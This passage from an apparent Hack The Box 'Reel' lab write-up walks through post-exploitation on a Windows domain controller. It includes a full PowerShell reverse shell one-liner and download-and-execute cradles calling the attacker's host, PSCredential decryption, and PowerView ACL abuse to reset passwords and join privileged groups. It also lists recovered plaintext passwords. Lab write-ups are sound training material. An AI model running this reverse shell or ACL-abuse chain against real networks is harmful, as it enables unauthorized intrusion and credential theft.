<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
Because I can’t really use powershell in this meterpreter session, I had to downgrade to a normal powershell session.
I did grab the powershell reverse shell (one liner) from Nishang. It looks like this (saved as revshell.ps1):
1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Then, I launched a simple python http server to serve my revshell.ps1:
1
2
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
In my meterpreter session, I dropped to a system shell:
1
2
3
4
5
6
7
meterpreter > shell
Process 1568 created.
Channel 14 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\users\nico\Desktop>
In another terminal in my local machine, I set up netcat to listen for connections on port 1337 (the port I chose on the reverse shell script revshell.ps1):
1
2
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
Then, in my system shell in meterpreter, I ran the following command to grab the powershell reverse shell from my http server and execute it right away in powershell:
1
C:\users\nico\Desktop>powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.14.5/revshell.ps1')|iex"
Instantly, I received the http GET request grabbing the powershell reverse shell:
1
10.10.10.77 - - [07/May/2025 17:21:26] "GET /revshell.ps1 HTTP/1.1" 200 -
And got a session on my netcat listener:
1
2
3
4
5
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.77] 65523
PS C:\users\nico\Desktop>
In the new powershell session I run commands to decrypt the password in the PSCredential XML file:
1
2
3
4
PS C:\users\nico\Desktop> $encryptedPassword = Import-Clixml -Path 'C:\users\nico\desktop\cred.xml'
PS C:\users\nico\Desktop> $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
PS C:\users\nico\Desktop> $decryptedPassword
1ts-mag1c!!!
With cleartext credentials for system user Tom, I tried logging in to the machine to make sure they’re fr:
1
2
$ nxc smb 10.10.10.77 -u tom -p '1ts-mag1c!!!'SMB 10.10.10.77 445 REEL [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\tom:1ts-mag1c!!!
And I could log in via SSH as well:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ ssh [email protected]
The authenticity of host '10.10.10.77 (10.10.10.77)' can't be established.
ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.77' (ED25519) to the list of known hosts.
[email protected]'s password: 1ts-mag1c!!!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>
Horizontal Privilege Escalation: tom -> claire
Summary
PowerView showed Tom had WriteOwner on Claire’s AD object. We seized ownership, reset her password to SuperSecurePass123!, and SSH’d in as Claire.
Details
Wandering through “tom”’s files, I found an AD Audit folder, containing interesting notes:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\users\tom\desktop\AD Audit> dir
Directory: C:\users\tom\desktop\AD Audit
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/30/2018 12:44 AM BloodHound
-ar-- 5/29/2018 9:02 PM 182 note.txt
PS C:\users\tom\desktop\AD Audit> type .\note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query)
.
Maybe we should re-run Cypher query against other groups we've created.
I did transfer the latest sharphound collector to the machine:
1
scp SharpHound.exe [email protected]:'C:\windows\temp\sharphound.exe'
An run it, but the executable is blocked by AppLocker, even in common locations like C:\Windows\temp:
1
2
3
4
5
6
7
8
9
10
PS C:\Windows\temp> .\sharphound.exe
Program 'sharphound.exe' failed to run: This program is blocked by group policy. For more
information, contact your system administratorAt line:1 char:1
+ ..\documents\sharphound.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ..\documents\sharphound.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Or even the powershell version:
1
2
3
4
5
6
7
8
9
PS C:\Users\tom\desktop> powershell.exe -ep bypass -C "IEX(New-Object Net.Webclient).DownloadS
tring('http://10.10.14.15/SharpHound.ps1');Invoke-BloodHound"
Exception calling "Invoke" with "2" argument(s): "Method not found: '!!0[]
System.Array.Empty()'."
At line:421 char:88
+ ... nvoke($Null, @(,$passed))
+ ~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : MissingMethodException
But neither did work. So, I proceeded to enumerate the domain manually with PowerView:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\Users\tom\desktop> import-module .\powerview.ps1
PS C:\Users\tom\desktop> $sid = Convert-NameToSid tom
PS C:\Users\tom\desktop> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1130
ActiveDirectoryRights : WriteOwner
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 524288
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-1107
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
And it seems like “tom” (our controlled user) has WriteOwner over “claire”. That means we can take ownership of the user object and force change their password:
1
2
3
4
PS C:\Users\tom\desktop> Set-DomainObjectOwner -Identity 'claire' -OwnerIdentity 'tom'
PS C:\Users\tom\desktop> Add-DomainObjectAcl -Rights 'All' -TargetIdentity "claire" -PrincipalIdentity "tom"
PS C:\Users\tom\desktop> net user claire SuperSecurePass123!
The command completed successfully.
And I was able to log in as “claire” using the newly set password via ssh:
1
2
3
4
5
6
7
8
9
$ ssh [email protected]
[email protected]'s password: SuperSecurePass123!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>whoami
htb\claire
claire@REEL C:\Users\claire>
Vertical Privilege Escalation: claire -> administrator
Summary
Claire had WriteDACL on the Backup_Admins group. We added her, ran winPEAS to find stored credentials, accessed the Administrator folder, and discovered the admin password (Cr4ckMeIfYouC4n!) in a backup script—then SSH’d in as Administrator.
Details
I performed the same manual enumeration for ACLs as I did earlier for “tom” but this time for “claire”:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\Users\tom\desktop> import-module .\powerview.ps1
PS C:\Users\tom\desktop> $sid = Convert-NameToSid claire
PS C:\Users\tom\desktop> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : CN=Backup_Admins,OU=Groups,DC=HTB,DC=LOCAL
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1135
ActiveDirectoryRights : ReadProperty, WriteProperty, GenericExecute, WriteDacl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 393268
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-1130
AceType : AccessAllowed
AceFlags : ContainerInherit
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None
Seems like claire has WriteDacl over the “Backup_Admins” group. To take advantage of this ACL, I log in as “claire” via SSH and import PowerView.ps1 again, this time as “claire”.
1
PS C:\Users\claire\Desktop> import-module .\powerview.ps1
I proceed to add “WriteMembers” rights to “claire” over the “Backup_Admins” group:
1
2
PS C:\Users\claire\Desktop> Add-DomainObjectAcl -Rights 'WriteMembers' -TargetIdentity "Backup_Admins" -PrincipalIdentity "claire"
PS C:\Users\claire\Desktop> Add-DomainGroupMember -Identity "Backup_Admins" -Members "claire"
Just to make sure “claire” is now a member of the group, I run net group:
1
2
3
4
5
6
PS C:\Users\claire\Desktop> net group "Backup_Admins" claire /add /domain
User claire is already a member of group Backup_Admins.
More help is available by typing NET HELPMSG 3754.
PS C:\Users\claire\Desktop>
Initially I had no idea what this group is about, but being a group related somehow to backups, I immediately launched impacket-secretsdump from my linux machine, but with no success:
1
2
3
4
5
6
7
8
9
10
$ secretsdump.py [email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning
I tried doing it manually by copying the necessary registry hives, but nothing, I get access denied errors:
1
2
3
4
PS C:\Users\claire\Desktop> reg save hklm\system C:\Users\claire\Documents\system
ERROR: A required privilege is not held by the client.
PS C:\Users\claire\Desktop> reg save hklm\security C:\Users\claire\Documents\security
ERROR: Access is denied.
To find out what this group is about, I disconnected from my current SSH session as “claire” and connected again, with a fresh session and all permissions related to the Backup_Admins group properly applied in my session. Then, I did transfer “winpeas.ps1” to the victim machine, and run it. Among the output, I could discover the password for local user “nico”:
1
2
3
4
=========|| Additonal Winlogon Credentials Check
HTB
nico
4dri@na2017!**
The credentials being:
1
nico:4dri@na2017!**
Also, among the results from winpeas, it seems like for some reason I now have access to the Administrator user folder at C:\users\administrator:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
claire@REEL C:\Users\claire>cd C:\users\Administrator
claire@REEL C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator
02/17/2018 12:29 AM <DIR> .
02/17/2018 12:29 AM <DIR> ..
10/28/2017 12:14 AM <DIR> .config
10/28/2017 12:28 AM <DIR> .oracle_jre_usage
10/28/2017 12:00 AM <DIR> Contacts
01/21/2018 03:56 PM <DIR> Desktop
05/29/2018 10:19 PM <DIR> Documents
02/17/2018 12:29 AM <DIR> Downloads
10/28/2017 12:00 AM <DIR> Favorites
10/28/2017 12:00 AM <DIR> Links
10/28/2017 12:00 AM <DIR> Music
10/26/2017 09:20 PM <DIR> OneDrive
10/31/2017 10:38 PM <DIR> Pictures
10/28/2017 12:00 AM <DIR> Saved Games
10/28/2017 12:00 AM <DIR> Searches
10/28/2017 12:00 AM <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 4,976,623,616 bytes free
claire@REEL C:\Users\Administrator>
Unfortunately, the box isn’t over yet as I can’t read root.txt:
1
2
claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.
However, in Administrator’s user desktop, there’s a “Backup Scripts” folder:
1
2
3
4
5
6
7
8
9
10
11
12
laire@REEL C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator\Desktop
01/21/2018 03:56 PM <DIR> .
01/21/2018 03:56 PM <DIR> ..
11/02/2017 10:47 PM <DIR> Backup Scripts
05/11/2025 02:36 PM 34 root.txt
1 File(s) 34 bytes
3 Dir(s) 4,976,623,616 bytes free
There are a bunch of different backup scripts:
1
2
3
4
5
6
7
8
9
10
11
12
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 10:47 PM <DIR> .
11/02/2017 10:47 PM <DIR> ..
11/04/2017 12:22 AM 845 backup.ps1
11/02/2017 10:37 PM 462 backup1.ps1
11/04/2017 12:21 AM 5,642 BackupScript.ps1
11/02/2017 10:43 PM 2,791 BackupScript.zip
11/04/2017 12:22 AM 1,855 folders-system-state.txt
11/04/2017 12:22 AM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 4,976,623,616 bytes free
I did have access to read them, so I went through each of them. On the first lines of BackupScript.ps1, they have the admin password hardcoded:
1
2
3
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4ckMeIfYouC4n!"
I could use this admin password to log in to the machine as “administrator” via SSH:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
administrator@REEL C:\Users\Administrator>whoami
htb\administrator
administrator@REEL C:\Users\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::247
IPv6 Address. . . . . . . . . . . : dead:beef::35be:d552:f422:2ae0
Link-local IPv6 Address . . . . . : fe80::35be:d552:f422:2ae0%12
IPv4 Address. . . . . . . . . . . : 10.10.10.77
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c0a4%12
10.10.10.2
Tunnel adapter isatap.{D624EF91-4048-48C6-9EA9-5EB2ACE63486}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : htb
administrator@REEL C:\Users\Administrator>
Conclusion
In this engagement, we systematically uncovered vulnerabilities across multiple services, and leveraged each finding to advance our foothold. By combining thorough enumeration with targeted exploitation (crafting a malicious RTF, decrypting credentials, and performing ACL enumeration), we escalated privileges from a standard user to domain administrator.